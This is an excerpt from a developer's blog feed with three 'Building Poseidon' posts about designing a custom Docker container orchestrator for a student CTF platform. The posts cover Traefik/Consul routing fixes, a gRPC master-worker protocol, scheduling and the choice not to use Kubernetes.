<p><strong>The Problem:</strong> Traefik was auto-generating routing rules based on the service name (<code>instance-svc-{uuid}</code>), not the hostname we wanted. Users would hit <a target="_blank" href="http://a3f4b92c8d.orcactf.app"><code>a3f4b92c8d.orcactf.app</code></a>, and Traefik would return 404 because it had created a route for <a target="_blank" href="http://instance-svc-3f053024-2418-4b4c-97d1-0590c5d9f480.orcactf.app"><code>instance-svc-3f053024-2418-4b4c-97d1-0590c5d9f480.orcactf.app</code></a>.</p>
<p><strong>The Root Cause:</strong> Traefik’s Consul provider has “smart” defaults that infer routing rules from service metadata. It was <em>too smart</em>, overriding our tags with its own generated rules.</p>
<p><strong>The Fix:</strong> Two critical config changes:</p>
<ol>
<li><p>Set <code>exposedByDefault: false</code> in <code>traefik.yml</code></p>
<ul>
<li><p>Forces Traefik to only process services explicitly tagged with <code>traefik.enable=true</code></p>
</li>
<li><p>Disables auto-route generation</p>
</li>
</ul>
</li>
<li><p><strong>Use explicit router rules in tags:</strong></p>
<pre><code class="lang-python"> <span class="hljs-string">f"traefik.<span class="hljs-subst">{protocol}</span>.routers.<span class="hljs-subst">{service_id}</span>.rule=Host(`<span class="hljs-subst">{route_def.hostname}</span>`)"</span>
</code></pre>
<ul>
<li><p>Overrides Traefik’s default rule generation</p>
</li>
<li><p>Ensures we control the hostname matching logic</p>
</li>
</ul>
</li>
</ol>
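<p>Putting both fixes together: a minimal sketch of the tag list the Master could register with each instance’s Consul service ( the helper name and defaults are illustrative, not the actual Poseidon code ):</p>
<pre><code class="lang-python">def traefik_tags(service_id, hostname, protocol="http"):
    """Explicit Consul tags so Traefik routes by our hostname
    instead of auto-generating a rule from the service name."""
    return [
        "traefik.enable=true",  # required once exposedByDefault is false
        f"traefik.{protocol}.routers.{service_id}.rule=Host(`{hostname}`)",
    ]
</code></pre>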
<p>After these changes, routes worked perfectly. But getting there took several passes through <a target="_blank" href="https://doc.traefik.io/traefik/reference/install-configuration/providers/hashicorp/consul-catalog/">Traefik’s Consul provider documentation</a> to understand the rules.</p>
<p><strong>Lesson learned:</strong> When integrating tools that "just work," the hard part is understanding what they do automatically and how to override it when needed.</p>
<h2 id="heading-whats-still-missing">What’s Still Missing</h2>
<p>This works locally. AWS deployment will add complexity:</p>
<ol>
<li><p><strong>Network Load Balancer:</strong></p>
<p> Currently testing with direct Traefik access. In production, an NLB will front all workers, and the flow becomes:</p>
<pre><code class="lang-plaintext"> DNS → Route53 → NLB → Worker Traefik → Container
</code></pre>
</li>
<li><p><strong>Multi-node Consul Cluster</strong></p>
<p> Right now, a single Consul server is a single point of failure: if Consul dies, routing goes down. If we ever scale this, we’ll need a 3-node cluster for HA ( high availability ).</p>
</li>
<li><p><strong>VPC Networking:</strong></p>
<p> Workers need appropriate security group rules: inbound traffic from the NLB, plus inbound and outbound traffic between workers.</p>
</li>
<li><p><strong>TLS/HTTPS:</strong></p>
<p> Currently running on HTTP only; we need Traefik to terminate TLS, with certificates from Let’s Encrypt or AWS Certificate Manager.</p>
</li>
<li><p><strong>The Reaper Process:</strong></p>
<p> Containers have TTLs. We need a background process that:</p>
<ul>
<li><p>Polls Redis for expired instances</p>
</li>
<li><p>Calls <code>deprovision_instance()</code> for each of them</p>
</li>
<li><p>Handles orphaned containers ( in case the Master crashes before cleanup )</p>
</li>
</ul>
</li>
</ol>
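<p>A minimal sketch of the reaper’s core logic, with an in-memory dict standing in for Redis and a hypothetical <code>deprovision</code> callback ( the real process would scan Redis and call <code>deprovision_instance()</code> ):</p>
<pre><code class="lang-python">import time

def reap_expired(instances, deprovision):
    """Deprovision every instance whose TTL has lapsed; return their IDs."""
    now = time.time()
    reaped = []
    for instance_id, meta in list(instances.items()):
        if now >= meta["expires_at"]:
            deprovision(instance_id)  # tears down the container and its route
            del instances[instance_id]
            reaped.append(instance_id)
    return reaped
</code></pre>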
<p>This is infrastructure work, not architecture work. The hard part of designing and implementing the system is done.</p>
<h2 id="heading-failure-mode-analysis">Failure Mode Analysis</h2>
<p>Let's validate that we actually improved resilience:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td><strong>Failure</strong></td><td><strong>Old Architecture</strong></td><td><strong>New Architecture</strong></td></tr>
</thead>
<tbody>
<tr>
<td>Master Crashes</td><td>Routing dies, users disconnected</td><td>Routing unaffected, orchestration paused</td></tr>
<tr>
<td>Worker Crashes</td><td>Only its containers die</td><td>Only its containers die, NLB removes it from the pool</td></tr>
<tr>
<td>Traefik crashes (single)</td><td>All routing dies</td><td>Other Traefik instances compensate</td></tr>
<tr>
<td>Consul crashes (single node)</td><td>N/A</td><td>Routing breaks (needs multi-node cluster)</td></tr>
</tbody>
</table>
</div><p><strong>Net improvement:</strong> I eliminated the "Master down = routing down" failure mode, which was the biggest architectural risk.</p>
<h2 id="heading-horizontal-scaling-the-math">Horizontal Scaling: The Math</h2>
<p><strong>Old architecture:</strong></p>
<ul>
<li><p>1 Master with Traefik = fixed routing capacity</p>
</li>
<li><p>Add workers = more compute, same routing bottleneck</p>
</li>
</ul>
<p><strong>New architecture:</strong></p>
<ul>
<li><p>N workers = N Traefik instances = N × routing capacity</p>
</li>
<li><p>Add worker = more compute AND more routing capacity</p>
</li>
</ul>
<p><strong>Example:</strong> If each Traefik can handle 1000 req/sec:</p>
<ul>
<li><p>1 centralized Traefik = 1000 req/sec max</p>
</li>
<li><p>5 workers with Traefik = 5000 req/sec max (behind NLB)</p>
</li>
</ul>
<p>This scales routing capacity horizontally, not just compute capacity.</p>
<h2 id="heading-lessons-learned">Lessons Learned</h2>
<h3 id="heading-1-controldata-plane-separation-is-real">1. Control/Data Plane Separation is Real</h3>
<p>This isn't just theory from distributed systems textbooks. The moment you separate "who decides" from "who executes," resilience improves dramatically.</p>
<h3 id="heading-2-service-mesh-reduces-coupling">2. Service Mesh Reduces Coupling</h3>
<p>Master doesn't know about Traefik. Workers don't know about routing logic. Consul is the only shared dependency. This means:</p>
<ul>
<li><p>We could swap Traefik for Nginx without touching the Master</p>
</li>
<li><p>We could change scheduling logic without touching Traefik</p>
</li>
<li><p>Each component has a single, clear responsibility</p>
</li>
</ul>
<h3 id="heading-3-tool-documentation-matters-more-than-you-think">3. Tool Documentation Matters More Than You Think</h3>
<p>The Traefik tag issue cost hours because I assumed defaults would work. Reading the Consul provider docs thoroughly upfront would have saved time.</p>
<h3 id="heading-4-test-failure-modes-early">4. Test Failure Modes Early</h3>
<p>Spinning up multiple workers locally and killing processes randomly validated the architecture way before AWS deployment. If it doesn't work with 2 local workers, it won't work with 10 EC2 instances.</p>
<p>The system works. Now we need to make it production-ready.</p>
<hr />
<p><em>Follow along as I continue building Poseidon. The code will be open-sourced once we’ve deployed and tested on AWS infrastructure.</em></p>
<p><strong>Previous Posts:</strong> <a target="_blank" href="https://hashnode.com/post/cmh8p84e9001902jr0l2id7iu">Part 1</a> | <a target="_blank" href="https://hashnode.com/post/cmhipb89k000802jl1yz0bhf5">Part 2</a></p>
]]></content:encoded></item><item><title><![CDATA[Building Poseidon #2: The Master-Worker Dance]]></title><description><![CDATA[In Part 1 of Building Poseidon, we established why we’re building Poseidon instead of using existing solutions like Kubernetes or AWS Fargate. We need instance-specific routing, fine-grained lifecycle control, and cost-effective operation within the ...]]></description><link>https://blog.realrudrap.dev/building-poseidon-2-the-master-worker-dance</link><guid isPermaLink="true">https://blog.realrudrap.dev/building-poseidon-2-the-master-worker-dance</guid><category><![CDATA[Docker]]></category><category><![CDATA[Cloud Computing]]></category><category><![CDATA[CTF]]></category><category><![CDATA[gRPC]]></category><category><![CDATA[System Design]]></category><category><![CDATA[Devops]]></category><dc:creator><![CDATA[Rudra Ponkshe]]></dc:creator><pubDate>Mon, 03 Nov 2025 05:30:15 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1761898397042/2b3746d5-0db8-4cac-aa6d-6c276e12fae7.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In <a target="_blank" href="https://stackunwind.hashnode.dev/building-poseidon-1-why-were-not-using-kubernetes">Part 1 of Building Poseidon</a>, we established why we’re building Poseidon instead of using existing solutions like Kubernetes or AWS Fargate. We need instance-specific routing, fine-grained lifecycle control, and cost-effective operation within the AWS free tier.</p>
<p>Now comes the challenging part: Actually building it.</p>
<blockquote>
<p>Talk is cheap. Show me the code. - Linus Torvalds</p>
</blockquote>
<p>This post dives into the master-worker communication protocol, the orchestration logic that schedules containers across workers, and the real-world problems we hit along the way. Everything described here is running on my local machine right now; AWS deployment comes later.</p>
<h2 id="heading-the-architecture-a-quick-recap">The Architecture: A Quick Recap</h2>
<p>Poseidon follows a two-process model:</p>
<ul>
<li><p><strong>Master Process:</strong> Exposes a REST API to OrcaCTF’s backend, maintains global state in Redis, orchestrates container lifecycles across workers.</p>
</li>
<li><p><strong>Worker Process:</strong> Runs on compute nodes, interfaces with the Docker daemon, spins up containers, and reports status back to the Master.</p>
</li>
</ul>
<p>The Master itself doesn’t know ( or care ) what kind of images it’s running. It’s a dumb executor that receives requests like:</p>
<pre><code class="lang-json">{
  <span class="hljs-attr">"user_id"</span>: <span class="hljs-string">"litmus"</span>,
  <span class="hljs-attr">"challenge_id"</span>: <span class="hljs-string">"localhost:5000/orca-challenges/our-first-challenge:latest"</span>,
  <span class="hljs-attr">"mem_limit"</span>: <span class="hljs-number">256</span>,
  <span class="hljs-attr">"nano_cpus"</span>: <span class="hljs-number">5000000</span>,
  <span class="hljs-attr">"protocol"</span>: <span class="hljs-string">"http"</span>
}
</code></pre>
<p>It returns a unique hostname at which the user’s requested container is accessible.</p>
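<p>A response might look like the following sketch ( the field names are illustrative assumptions; only the hostname scheme is taken from the design ):</p>
<pre><code class="lang-json">{
  "instance_id": "3f053024-2418-4b4c-97d1-0590c5d9f480",
  "hostname": "a3f4b92c8d.orcactf.app",
  "expires_at": 1764136330
}
</code></pre>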
<h3 id="heading-the-communication-protocol-rest-for-clients-grpc-for-workers">The Communication Protocol: REST for Clients, gRPC for Workers</h3>
<p>Early on, I had to decide: how should the master and worker talk to each other?</p>
<h4 id="heading-the-decision-hybrid-approach">The Decision: A Hybrid Approach</h4>
<p><strong>Master &lt;→ Frontend/Backend:</strong> REST API</p>
<ul>
<li><p>OrcaCTF’s backend makes simple HTTP requests to start/stop containers</p>
</li>
<li><p>Easy to debug with cURL, integrates with existing FastAPI infrastructure</p>
</li>
<li><p>No gRPC dependencies needed on the client ( OrcaCTF backend ) side</p>
</li>
</ul>
<p><strong>Master ←&gt; Workers:</strong> gRPC</p>
<ul>
<li><p>Workers are internal infrastructure, not exposed to users</p>
</li>
<li><p>Need high performance, low latency communication for container operations</p>
</li>
<li><p>Strong typing via Protocol Buffers. Catches integration bugs early</p>
</li>
<li><p>Bi-directional streaming support which can be used for real-time logs and metrics</p>
</li>
</ul>
<p>This isn’t an either-or decision. REST is great for public APIs, whilst gRPC is better for internal service-to-service communication where performance and type safety matter.</p>
<h3 id="heading-the-grpc-protocol-definition">The gRPC Protocol Definition</h3>
<p>Here’s our <code>.proto</code> defining the worker service:</p>
<pre><code class="lang-protobuf">syntax = <span class="hljs-string">"proto3"</span>;
package poseidon.worker;

service WorkerService {
    rpc SpawnContainer(SpawnRequest) returns (SpawnResponse);
    rpc TerminateContainer(TerminateRequest) returns (TerminateResponse);
    rpc GetWorkerStatus(WorkerStatusRequest) returns (WorkerStatusResponse);
}

message SpawnRequest {
    string request_id = 1;
    string image_name = 2;
    int32 start_timeout_seconds = 3;
    int32 mem_limit = 4;
    int32 nano_cpus = 5;
}

message SpawnResponse {
    string container_id = 1;
    string internal_ip = 2;
    int32 internal_port = 3;
    bool success = 4;
    string error_message = 5;
}

message TerminateRequest {
    string container_id = 1;
}

message TerminateResponse {
    bool success = 1;
    string error_message = 2;
}

message WorkerStatusRequest {}

message WorkerStatusResponse {
    string node_id = 1;
    float cpu_usage_percent = 2;
    float memory_percent = 3;
    int32 container_count = 4;
}
</code></pre>
<h3 id="heading-key-design-decisions">Key design decisions:</h3>
<ul>
<li><p><code>SpawnResponse</code> returns the internal IP and port. The master needs to know where to route traffic. Containers run on a shared Docker network, so we use internal IPs, not published ports.</p>
</li>
<li><p><code>success</code> + <code>error_message</code> pattern: Workers can fail for many reasons ( image pull failure, resource exhaustion, Docker daemon issues ). Explicit success flags make error handling cleaner than relying on gRPC status codes alone.</p>
</li>
<li><p><code>GetWorkerStatus</code> for load balancing: Workers periodically report CPU, memory and container count. The master uses this for intelligent scheduling.</p>
</li>
</ul>
<h2 id="heading-worker-discovery-why-consul">Worker Discovery: Why Consul?</h2>
<p>One of the first problems: how does the Master know which workers exist and whether they’re healthy?</p>
<p>We could maintain a worker registry in Redis, but that introduces a new failure mode: what if a worker crashes without deregistering itself? The master would keep sending requests to a dead worker.</p>
<p><strong>Enter Consul</strong></p>
<p><a target="_blank" href="https://developer.hashicorp.com/consul">Consul</a> is a service mesh solution that handles service discovery and health-checking. Workers register themselves with Consul on startup, and Consul continuously health-checks them via gRPC’s health protocol.</p>
<h4 id="heading-why-consul-over-manual-health-checks">Why Consul over Manual Health Checks?</h4>
<p><strong>Separation of Concerns:</strong> The master doesn’t have to implement heartbeat logic. Consul does that out of the box.</p>
<p><strong>Graceful draining:</strong> When we deploy to AWS, worker instances will sit behind a load balancer, which may de-provision a worker when load is low. A worker slated for removal can report a “draining” status in its health check responses; Consul then informs the Master not to schedule new instances on that node while existing containers complete their tenure ( and requests for extensions are denied ).</p>
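<p>The draining behaviour reduces to a tiny state machine. The stand-in below mirrors what the worker’s health responder would report ( a sketch only; the real implementation would answer via gRPC’s health protocol rather than a plain class ):</p>
<pre><code class="lang-python">class WorkerHealth:
    """Minimal stand-in for the worker's gRPC health responder."""
    SERVING = "SERVING"
    NOT_SERVING = "NOT_SERVING"

    def __init__(self):
        self.draining = False

    def status(self):
        # While draining, report NOT_SERVING so Consul stops advertising
        # this node and the Master schedules no new instances here.
        return self.NOT_SERVING if self.draining else self.SERVING
</code></pre>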
<p><strong>Proven reliability:</strong> Consul is battle-tested infrastructure. We’re not re-inventing service discovery.</p>
<p>The Master queries Consul for healthy workers and gets back a list of <code>(node_id, address)</code> pairs. Simple.</p>
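<p>As a sketch of that query: Consul’s health endpoint ( <code>/v1/health/service/&lt;name&gt;?passing=true</code> ) returns one entry per healthy instance, which reduces to the pairs the scheduler needs. The payload shape below follows Consul’s documented response format; the helper name is ours:</p>
<pre><code class="lang-python">def healthy_workers(consul_payload):
    """Reduce a Consul health response to (node_id, address) pairs."""
    return [
        (entry["Service"]["ID"],
         f'{entry["Service"]["Address"]}:{entry["Service"]["Port"]}')
        for entry in consul_payload
    ]
</code></pre>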
<h2 id="heading-the-orchestration-flow-from-request-to-running-container">The Orchestration Flow: From Request to Running Container</h2>
<p>Let’s walk through what happens when a user clicks “Start Challenge”</p>
<h4 id="heading-phase-1-worker-selection-scheduling">Phase 1: Worker Selection ( Scheduling )</h4>
<p>The Orchestrator asks the Scheduler for the best available Worker:</p>
<pre><code class="lang-python">selected_worker = <span class="hljs-keyword">await</span> self.scheduler.get_best_worker()
<span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> selected_worker:
    <span class="hljs-keyword">raise</span> RuntimeError(<span class="hljs-string">"No available workers to handle request"</span>)
</code></pre>
<p>The scheduler implements a weighted score system:</p>
<pre><code class="lang-python">cpu_weight = <span class="hljs-number">0.5</span>
mem_weight = <span class="hljs-number">0.3</span>
container_weight = <span class="hljs-number">0.2</span>

score = (cpu * cpu_weight) + (mem * mem_weight) + (container_count * container_weight)
</code></pre>
<p>Workers with lower scores ( less loaded ) are preferred. This is a simple heuristic, not a sophisticated bin-packing algorithm, but it works at our expected scale.</p>
<p>The Scheduler polls all workers every 15 seconds via <code>GetWorkerStatus</code>, caching their metrics in Redis. When a container request arrives, it picks the worker with the lowest score from the cached data.</p>
<p><strong>Trade-off:</strong> There’s a 15 second window where Worker stats might be stale. A worker could become overloaded between polls, and the scheduler wouldn’t know. For our use case (15-20 concurrent users) this should do the trick. When we scale and need real-time accuracy, we could poll more frequently, or use event-driven updates.</p>
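<p>The selection logic above can be sketched as a runnable snippet over the cached metrics ( the dict shape is illustrative; the real scheduler reads these values from Redis ):</p>
<pre><code class="lang-python">CPU_WEIGHT, MEM_WEIGHT, CONTAINER_WEIGHT = 0.5, 0.3, 0.2

def score(stats):
    # Lower is better: a lightly loaded worker wins.
    return (stats["cpu"] * CPU_WEIGHT
            + stats["mem"] * MEM_WEIGHT
            + stats["containers"] * CONTAINER_WEIGHT)

def get_best_worker(workers):
    """Pick the least-loaded worker from cached GetWorkerStatus metrics."""
    if not workers:
        return None
    return min(workers, key=lambda node_id: score(workers[node_id]))
</code></pre>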
<h4 id="heading-phase-2-container-spawn">Phase 2: Container Spawn</h4>
<p>Once a worker is selected, the Orchestrator sends a gRPC <code>SpawnContainer</code> request:</p>
<pre><code class="lang-python">running_container = <span class="hljs-keyword">await</span> self.worker_client.spawn_container(
    selected_worker,
    challenge_id,
    instance_id,
    mem_limit,
    nano_cpus
)
</code></pre>
<p>On the Worker side, this triggers <code>DockerManager</code>:</p>
<pre><code class="lang-python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run_container</span>(<span class="hljs-params">self, image_name: str, instance_id: str, 
                  mem_limit: int | None, nano_cpus: int | None</span>) -&gt; Container:</span>
    memory_limit_str = <span class="hljs-string">f"<span class="hljs-subst">{mem_limit}</span>m"</span> <span class="hljs-keyword">if</span> mem_limit <span class="hljs-keyword">else</span> <span class="hljs-string">"256m"</span>

    <span class="hljs-keyword">try</span>:
        container = self.client.containers.run(
            image=image_name,
            detach=<span class="hljs-literal">True</span>,
            auto_remove=<span class="hljs-literal">True</span>,
            labels={<span class="hljs-string">"poseidon.instance_id"</span>: instance_id},
            network=self.network_name,
            mem_limit=memory_limit_str,
            nano_cpus=nano_cpus
        )
        <span class="hljs-keyword">return</span> container
    <span class="hljs-keyword">except</span> ImageNotFound:
        logger.warning(<span class="hljs-string">f"Image '<span class="hljs-subst">{image_name}</span>' not found locally. Pulling..."</span>)
        self.client.images.pull(image_name)
        <span class="hljs-keyword">return</span> self.run_container(image_name, instance_id, mem_limit, nano_cpus)
</code></pre>
<p><strong>Key Details:</strong></p>
<ul>
<li><p><code>auto_remove: True</code>: Containers are ephemeral; When they stop, Docker automatically cleans them up</p>
</li>
<li><p><code>labels={"poseidon.instance_id": instance_id}</code> : Labels enable visibility. Having descriptive labels like this helps in pinpointing the sources of any issues. Traefik ( our reverse-proxy ) can also be configured to route traffic depending on these labels</p>
</li>
<li><p><strong>Automatic image pulling:</strong> If the challenge image isn’t cached locally, the worker pulls it. This adds latency on the first request, but simplifies deployment.</p>
</li>
</ul>
<h3 id="heading-phase-3-network-discovery">Phase 3: Network Discovery</h3>
<p>After the container starts, the worker needs to determine its internal IP and report it, along with the port the container is served on. This is trickier than it sounds.</p>
<p>Containers run on a shared Docker network. We don’t use published ports because that would require dynamic port allocation and port conflict handling. Instead, containers expose their services on an internal port ( like 8080 for HTTP challenges ), and Traefik routes traffic based on the hostname.</p>
<pre><code class="lang-python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get_container_details</span>(<span class="hljs-params">self, container_id: str</span>) -&gt; dict | <span class="hljs-keyword">None</span>:</span>
    container = self.client.containers.get(container_id)
    container.reload()

    <span class="hljs-comment"># Get IP from the shared network</span>
    network_settings = container.attrs[<span class="hljs-string">'NetworkSettings'</span>][<span class="hljs-string">'Networks'</span>][self.network_name]
    ip_address = network_settings[<span class="hljs-string">'IPAddress'</span>]

    <span class="hljs-comment"># Get the internal port from the image's EXPOSE directive</span>
    exposed_ports = container.attrs[<span class="hljs-string">'Config'</span>][<span class="hljs-string">'ExposedPorts'</span>]
    internal_port_str = list(exposed_ports.keys())[<span class="hljs-number">0</span>]  <span class="hljs-comment"># e.g., "80/tcp"</span>
    internal_port = int(internal_port_str.split(<span class="hljs-string">'/'</span>)[<span class="hljs-number">0</span>])

    <span class="hljs-keyword">return</span> {
        <span class="hljs-string">"id"</span>: container.id,
        <span class="hljs-string">"ip_address"</span>: ip_address,
        <span class="hljs-string">"internal_port"</span>: internal_port,
    }
</code></pre>
<p>This relies on challenge images correctly declaring their exposed ports via <code>EXPOSE</code> in the Dockerfile. If the challenge doesn’t expose a port, this logic fails. This is intentional as it helps catch misconfigurations early.</p>
<h3 id="heading-phase-4-state-management-and-routing">Phase 4: State Management and Routing</h3>
<p>Once the container is running, the Orchestrator:</p>
<ul>
<li><p><strong>Generates a unique hostname:</strong> <code>sha256(instance_id)[:12].&lt;ctf_platform_domain&gt;</code></p>
</li>
<li><p><strong>Saves the instance metadata to Redis</strong></p>
<pre><code class="lang-python">  instance = Instance(
         instance_id=instance_id,
         user_id=user_id,
         challenge_id=challenge_id,
         worker=selected_worker,
         hostname=<span class="hljs-string">f"<span class="hljs-subst">{external_hostname}</span>.local"</span>,
         container_id=running_container.container_id,
         internal_ip=running_container.internal_ip,
         internal_port=running_container.internal_port,
         created_at=now_ts,
         expires_at=now_ts + cfg.default_ttl_seconds
     )
     <span class="hljs-keyword">await</span> self.state_manager.save_instance(instance)
</code></pre>
</li>
<li><p><strong>Creates a routing rule in Traefik</strong></p>
<pre><code class="lang-python">      route_definition = RouteDefinition(
             instance_id=instance.instance_id,
             protocol=protocol,
             hostname=instance.hostname,
             backend_ip=running_container.internal_ip,
             backend_port=running_container.internal_port,
         )
         self.proxy_manager.create_route(route_definition)
</code></pre>
</li>
</ul>
<p>Traefik now knows: “traffic to <code>a3f4b92c8d.local</code> should go to <code>172.18.0.5:80</code>”.</p>
<p>The user receives their unique URL, and can connect immediately.</p>
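<p>The hostname derivation above is deterministic, so the same instance always maps to the same subdomain. A minimal sketch:</p>
<pre><code class="lang-python">import hashlib

def instance_hostname(instance_id, domain="orcactf.app"):
    # First 12 hex chars of SHA-256 keep URLs short while collisions
    # stay vanishingly unlikely at our scale.
    digest = hashlib.sha256(instance_id.encode()).hexdigest()
    return f"{digest[:12]}.{domain}"
</code></pre>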
<h3 id="heading-what-broke-and-how-we-fixed-it">What broke ( and how we fixed it )</h3>
<h4 id="heading-problem-1-silent-deployment-failures">Problem 1: Silent Deployment Failures</h4>
<p>Early on, containers were failing to start, but the Orchestrator was reporting success. The issue? We weren’t checking the gRPC response properly:</p>
<pre><code class="lang-python"><span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> running_container.success:
    <span class="hljs-keyword">raise</span> RuntimeError(<span class="hljs-string">f"Failed to spawn container: <span class="hljs-subst">{running_container.error_message}</span>"</span>)
</code></pre>
<p>Now, if the worker reports <code>success=False</code>, the Orchestrator propagates the error up to the User. Simple, but easy to miss.</p>
<h4 id="heading-problem-2-docker-networking-hell">Problem 2: Docker Networking Hell</h4>
<p>Getting Traefik to reliably discover containers on the shared Docker network took far longer than expected. Containers were starting, but Traefik couldn’t route to them.</p>
<p>The issue was that Traefik was looking on the wrong network. We had to explicitly configure</p>
<pre><code class="lang-python">network=self.network_name  <span class="hljs-comment"># Must match Traefik's configured network</span>
<span class="hljs-comment"># An environment variable stored the value of self.network_name and initialized when the Orchestrator spawned</span>
</code></pre>
<p>And ensure that Traefik itself was running on the same Docker network. Obvious in hindsight; nothing short of painful in practice.</p>
<h4 id="heading-problem-3-cpu-limits-dont-work-in-docker-in-docker">Problem 3: CPU Limits don’t work in Docker-in-Docker</h4>
<p>We’re running workers as Docker containers themselves ( for local testing ), but Docker-in-Docker doesn’t support <code>nano_cpus</code> limits properly. The inner containers inherit the outer container’s limits, not their own.</p>
<p>For now, we’ve accepted this limitation. On AWS EC2 instances ( where Docker runs natively ), CPU limits will work as intended. But it’s a reminder that abstractions leak, and testing in production-like environments matters.</p>
<h3 id="heading-whats-next">What’s next</h3>
<p>This post covered the orchestration core: worker discovery, container spawning, and state management. But we’re not done. Next, we’ll explore containment and resilience: isolation, resource control, and ensuring the system can shut down gracefully without abandoning active users.</p>
<hr />
<p><em>Follow along as we continue building Poseidon. The code will be open-sourced soon after we test a deployed PoC.</em></p>
]]></content:encoded></item><item><title><![CDATA[Building Poseidon #1: Why we're not using Kubernetes]]></title><description><![CDATA[💡
TL;DR: Built Poseidon, a custom container orchestrator for CTF challenges. Evaluated Lambda (runtime limits), Fargate (no per-container routing), and Kubernetes (complexity overkill). Went with a master-worker architecture using Docker SDK, Redis,...]]></description><link>https://blog.realrudrap.dev/building-poseidon-1-why-were-not-using-kubernetes</link><guid isPermaLink="true">https://blog.realrudrap.dev/building-poseidon-1-why-were-not-using-kubernetes</guid><category><![CDATA[Docker]]></category><dc:creator><![CDATA[Rudra Ponkshe]]></dc:creator><pubDate>Mon, 27 Oct 2025 05:30:08 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1761534248036/031e20d9-3794-426f-8991-3ed7fa58bac8.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text"><strong>TL;DR:</strong> Built Poseidon, a custom container orchestrator for CTF challenges. Evaluated Lambda (runtime limits), Fargate (no per-container routing), and Kubernetes (complexity overkill). Went with a master-worker architecture using Docker SDK, Redis, and subdomain-based routing. Targets 15-20 concurrent users on AWS free tier. Open-sourcing soon.</div>
</div>

<h2 id="heading-the-problem-ctf-challenges-need-dynamic-infrastructure">The Problem: CTF Challenges Need Dynamic Infrastructure</h2>
<p>Capture The Flag (CTF) competitions have evolved significantly. Modern challenges often require isolated, interactive environments where participants can exploit vulnerabilities, reverse engineer binaries, or manipulate web applications in real time. These aren’t static challenges; they are live systems that need to be spun up on demand, accessible over the internet and then torn down after use.</p>
<p>For my Cloud Computing course project, my team is building <a target="_blank" href="http://orcactf.app"><strong>OrcaCTF</strong></a>. The vision was simple: students click a “Start Challenge” button, and within seconds they get a dedicated Docker container with a unique URL to connect to. The challenge runs for a set duration ( with extensions possible based on server load ), and then automatically cleans itself up.</p>
<p>We’re targeting 15-20 concurrent users initially, with an architecture that can scale far beyond that. We needed fine-grained control over container lifecycle, resource limits, and networking, and we needed to do it all on the AWS free tier.</p>
<p>The question became, <strong>what’s the best way to orchestrate ephemeral Docker containers in the cloud?</strong></p>
<h2 id="heading-evaluating-the-serverless-landscape">Evaluating the Serverless Landscape</h2>
<p>My first instinct was to leverage serverless services. After all, for a Cloud Computing course, surely AWS or Azure would have pre-built solutions for this exact use case, right?</p>
<h3 id="heading-aws-lambda-api-gateway">AWS Lambda + API Gateway</h3>
<p><strong>The Promise:</strong> Serverless functions ( with Docker container support ) that scale to zero, charge only for what you use, and handle thousands of concurrent requests.</p>
<p><strong>The Reality:</strong> Lambda has a maximum runtime of 15 minutes. CTF challenges may take from 30 minutes to several hours. Participants also usually need to step away and return to their environment. Lambda’s ephemeral nature and strict time limits made it a non-starter.</p>
<h3 id="heading-aws-fargate">AWS Fargate</h3>
<p><strong>The Promise:</strong> Serverless containers, just specify your Docker image, and the Cloud handles the rest.</p>
<p><strong>The Reality:</strong> These services, while really convenient, are designed for microservice architectures where instances are interchangeable and load-balanced. They are meant for <strong>instance-agnostic</strong> workloads.</p>
<p>We needed the opposite: <strong>Instance-specific routing.</strong> Each user needs their own container accessible via a unique subdomain like <code>a3f4b92c8d…orcactf.app</code>. Fargate abstracts away containers behind load balancers. Getting traffic to a <em>specific</em> container would require complex workarounds, and the solution would be tightly coupled to AWS-specific networking constructs.</p>
<h3 id="heading-aws-app-runner">AWS App Runner</h3>
<p>Similar story, great for deploying web services, but not so much for orchestrating user-specific ephemeral environments with custom networking requirements.</p>
<h2 id="heading-why-not-kubernetes-or-docker-swarm">Why not Kubernetes or Docker Swarm?</h2>
<p>The elephant in the room: Why not use battle tested orchestration platforms?</p>
<p><strong>Kubernetes</strong> is incredibly powerful, but it’s also incredibly complex. Setting up a cluster, managing nodes, configuring ingress controllers, wrangling pods vs deployments vs services; it’s a steep learning curve. For a project that has to go from zero to prototype in a month, K8s felt like bringing a cargo ship to a river rafting trip.</p>
<p>Moreover, Kubernetes is general-purpose by design. It is meant to manage long-lived services, rolling deployments and complex distributed systems. Our use case is much simpler: spin up a container, keep it alive for a few hours at maximum, and then clean it up. We don’t need auto-healing deployments or blue-green rollouts. We need <strong>ephemeral, user-scoped container lifecycle management.</strong></p>
<p>For our timeline and expertise level, and the project’s current projected scale, Kubernetes would be overkill.</p>
<p><strong>Docker Swarm</strong> has a gentler learning curve, but it’s still designed for orchestrating services across clusters, not managing per-user container instances with custom routing.</p>
<p>Both options also add operational overhead: cluster management, control plane High Availability (HA), storage orchestration, network policies. I’d be spending more time fighting the orchestrator than actually building the platform.</p>
<h2 id="heading-the-case-for-building-custom-enter-poseidon">The Case for Building Custom: Enter Poseidon</h2>
<p>After evaluating the existing landscape, my assumption was reaffirmed: our use case is niche, and the existing tools aren’t optimized for it. They’re designed for microservices ( many identical deployments behind a load balancer ) or long-lived services ( always running, scaled horizontally ). CTF challenges are neither.</p>
<p>So I decided to build <strong><em>Poseidon</em></strong>. Keeping with the marine theme of OrcaCTF, Poseidon is our ‘orchestrator of the deep’: a purpose-built engine designed to be simple and performant.</p>
<h3 id="heading-core-requirements">Core Requirements:</h3>
<ol>
<li><p><strong>Absolute Control Over Container Lifecycle</strong></p>
<ul>
<li><p>Spin up containers on-demand</p>
</li>
<li><p>Enforce resource limits (CPU, memory, disk)</p>
</li>
<li><p>Support custom timeouts with user-requested extensions</p>
</li>
<li><p>Clean shutdown and cleanup</p>
</li>
</ul>
</li>
<li><p><strong>Instance-Specific Routing</strong></p>
<ul>
<li><p>Each container gets a unique subdomain: <code>&lt;SHA256(instance_id)&gt;.orcactf.app</code></p>
</li>
<li><p>Traffic must route to the <em>specific</em> container, not a pool</p>
</li>
